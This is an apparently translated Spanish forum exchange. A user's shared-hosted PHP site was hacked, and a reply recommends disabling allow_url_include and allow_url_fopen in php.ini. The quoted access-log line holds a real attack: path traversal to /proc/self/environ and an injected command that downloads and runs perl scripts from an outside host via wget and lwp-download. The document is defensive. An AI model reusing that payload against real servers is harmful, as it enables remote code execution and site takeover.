Me han atacado en un servidor host compartido y me dijeron que debería configurar mi propio archivo php.ini correctamente.
Tengo un pequeño programa PHP / MySQL con una función de registro, un pequeño sitio de administración.
Sin embargo, alguien lo hackeó. Cualquier ayuda sería realmente apreciada con php.ini.
Esto es lo que obtuve del proveedor de alojamiento web:
121.254.216.170 - - [12 / Sep / 2011: 05: 21: 07 +0100] "GET /?p=../../../../../../../ ../../../../../../../../proc/self/environ%00 HTTP / 1.1 "200 5806" - "http://some.thesome.com /etc/byz.jpg? -O / tmp / cmd548; cd / tmp; lwp-download http: // algunos. thesome. com / etc / cup.txt; perl cup.txt; rm -rf .txt ; wget http: // algunos. thesome. com / etc / update.txt; perl update.txt; rm -rf .txt '); echo \ "# j13mb0t \"; ? > "
Debido a que la inyección de scripts ataca el código del sitio en sí, puede evitar completamente la seguridad del servidor web. Desafortunadamente, algunos sistemas de administración de contenido (especialmente las versiones anteriores de Joomla) son extremadamente susceptibles a esta forma de ataque.
Una forma sencilla de eliminar la capacidad de los atacantes de usar este método es agregar un archivo php.ini en el nivel superior del sitio web con los siguientes contenidos. Tenga en cuenta que el sitio web necesitará pruebas posteriores para asegurarse de que el cambio no ha afectado a ninguna acción legítima mediante scripts del sitio web:
Las directivas php.ini son:
allow_url_include = "0"
allow_url_fopen = "0"